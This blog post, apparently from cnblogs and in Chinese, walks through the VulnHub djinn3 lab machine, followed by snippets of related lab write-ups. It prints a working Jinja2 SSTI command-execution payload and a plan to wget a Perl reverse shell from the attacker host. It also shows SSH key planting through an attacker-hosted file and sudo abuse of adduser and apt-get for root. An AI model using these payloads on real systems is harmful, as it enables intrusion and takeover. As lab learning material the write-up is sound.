vulnhub靶机：djinn3

时间：2024-03-25 20:33:22浏览次数：33

标签：文件 attr 端口 djinn3 perl x5f vulnhub saint 靶机

一：信息收集

1：主机发现

2：端口扫描

nmap -sV -p- -T4 10.9.23.26

3：端口探测

1：访问80端口，没有找到有用的信息

2：访问5000端口，提到一个默认用户guest

3：nc连接31337端口，需要输入用户名和密码，尝试刚刚的guest/guest，成功登录，这个是和5000端口相关联的，在这里创建，5000端口用于显示

nc 10.9.23.26 31337

反复测试发现存在ssti漏洞

SSTI (Server-Side Template Injection) 漏洞是一种常见的Web应用程序漏洞，允许攻击者在服务器端注入恶意代码到应用程序的模板中。这种漏洞通常发生在使用模板引擎的Web应用程序中，攻击者可以利用这个漏洞执行任意代码，包括读取敏感数据、控制服务器等。

在twig模板会以乘积结果显示，而jinja2中则是以乘方显示

二：渗透测试

1：漏洞利用

https://github.com/swisskyrepo/PayloadsAllTheThings

找到jinja2的那个payload

以上结果说明ssti引擎是jinja2，网上搜集jinja2的反弹shell，搜索ssti的payload，得到

{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}

把id改成wget，然后加上我们攻击机的反弹shell文件，使用perl，注意要改下文件里的ip和端口

路径/usr/share/webshells/perl/perl-reverse-shell.pl，使用的时候需要修改文件中的ip，并将文件复制到根目录下

最终我们要使用的payload就是下面这个

然后把上面的内容放在31337端口新建的ticket里面，kali用python开启http服务，然后进入5000端口，点击link即可得到shell

打开nc监听

反弹成功

python提权

python -c "import pty;pty.spawn('/bin/bash')"

2：ssh

然后把pspy64上传到靶机的tmp目录里，pspy64是检测主机的进程工具，运行发现存在两个py文件，搜索saint的文件

发现存在两个py文件，搜索saint的文件

find / -user saint 2>/dev/null

根据这两个python程序的源码，在/tmp下新建一个文件，文件名字为25-03-2024.config.json，内容如下，本地服务器的authorized_keys文件的内容是使用ssh-keygen生成的id_rsa.pub文件内容

{
"URL":"http://10.9.23.112/authorized_keys",
"Output":"/home/saint/.ssh/authorized_keys"

}

用ssh-keygen工具生成id_rsa.pub和id_rsa文件，keys文件就是id_rsa.pub的内容，然后kali开启http服务（这里由于靶机创建文件比较难，可以在kali新建json文件，然后靶机去下载）

等待片刻，进入kali的/root/.ssh目录下，直接连接saint用户即可

ssh [email protected]

3:提权

执行sudo -l，发现可以免密执行adduser命令，添加一个root组的用户

查看sudoers文件，查看还有哪些用户可以使用sudo执行命令，发现一个jason用户，但是这个用户并不存在，但是我们是可以新建用户的，所以需要密码（自己的密码）才能执行这个也就没有问题

sudo adduser choudan -gid=0

exit退回到saint用户，新建jason用户

切换到jason用户，使用apt-get命令提权

sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh

靶机结束

标签：文件,attr,端口,djinn3,perl,x5f,vulnhub,saint,靶机
From： https://www.cnblogs.com/woaishuaidan/p/18095258

应急响应靶机-4
拿到一个被黑客入侵过的靶机！需要找到黑客入侵的ip和三个flag那就进行一次入侵排查吧！检查账号从影子文件看，应该只有两个用户，而且密码近期没有被修改过，所以应该没有新添加用户这里看到root和wheel组都有特权，而我们发现wheel组中正好就是有defend用户，这说明它可以使用sudo充......
FUNBOX CTF 靶机
靶机信息地址页面名称:Funbox:CTF发布日期:2020年9月5日作者：0815R2d2系列:趣盒描述土拨鼠之日：Boot2Root！最初的脚步有点流畅，但确实不难。进入Funbox:CTF后，需要查找、阅读并理解（2个且易于查找的）提示。聪明并结合...提示：Nikto扫描“区分大小写”，您至......
billub0x(VulnHub)
billub0x一、nmap二、web渗透随便看看万能密码没戏bp抓包导成文件sqlmapsqlmap-rsql.txt--batch--dbs--random-agent-p"un"sqlmap-rsql.txt--batch--dbs--random-agent-p"ps"都没有什么结果目录爆破图片隐写一共有六张图片，两张图片看以来......
应急响应靶机-3
继续搞第三个靶机看看今天的问题日志里发现了两个Ip192.168.75.129和192.168.75.130发现一些问题这个192.168.75.129似乎一直访问一个cmd.php?act=verify,这个操作是在爆破弱口令登录，但是一直是500意味着它并没有登录成功！但是192.168.75.130似乎做了一些奇怪的操作，它似......
应急响应靶机训练-Linux2
靶机来源：知攻善防实验室公众号https://mp.weixin.qq.com/s/xf2FgkrjZg-yWlB9-pRXvw我是在另一台主机上通过ssh连接到靶机进行解题的，我的ip为192.168.1.103，以下为个人解题记录，写的比较粗糙，有不对的地方希望各位大佬指正。背景前景需要：看监控的时候发现webshell告警，领导让你上......
应急响应靶机-2
web应急响应靶场2看到题解有啥子还是打开php看看网站的web日志，看到这个system.php很可疑。我们打开看看这个文件在打开这个文件看看确定是一个webshell文件了，然后我们得分析溯源看看他是怎么上传的system.php看这个文件的属性他是在2月29号13点左右创建的我们先顺着web......
Kali学习笔记07-部署vulhub靶机
Kali学习笔记07-部署vulhub靶机KaliLinux网络安防一、下载vulhub从vulhub的github网站vulhub/vulhub上下载它的压缩包，得到一个叫做vulhub-master.zip的压缩包。二、解压缩unzipvulhub-master.zip三、进入到某一个漏洞目录中enterdescriptionhere四、自......
vulnhub靶机：djinn2
一：信息收集1：主机发现靶机ip10.9.23.2282：端口扫描nmap-A-p--T410.9.23.228上一个靶机多了个5000端口21221337500073313：端口探测1:21端口anonymousnitu:7846A$56@nitish81299@0xmzfr2:1337端口和第一个游戏不太一样，没啥用3:5000端口被拒绝了4:7331......
vulnhub靶机：djinn1
一：信息收集1：主机发现arp-scan-Ieth010.9.23.0/24靶机IP10.9.23.2122：端口扫描nmap-A-p--T410.9.23.212ftp允许匿名登录扫描ssh时被过滤了1337不知道是个什么端口7331端口是个python环境的web服务3：端口探测1：ftp端口ftp10.9.23.212anonymous查看文件......
buuctf靶机笔记3
BUUXSSCOURSE首页如此显然是持久性xss将数据存储到后台管理员访问后台触发xss后可以盗取cookie对后台进行登录但我们还不知道后台地址先尝试：<script>alert(1)</script>提交成功尝试访问没有触发弹窗可能后台存在过滤尝试用img标签：<imgsrc='11'onerror=alert(11......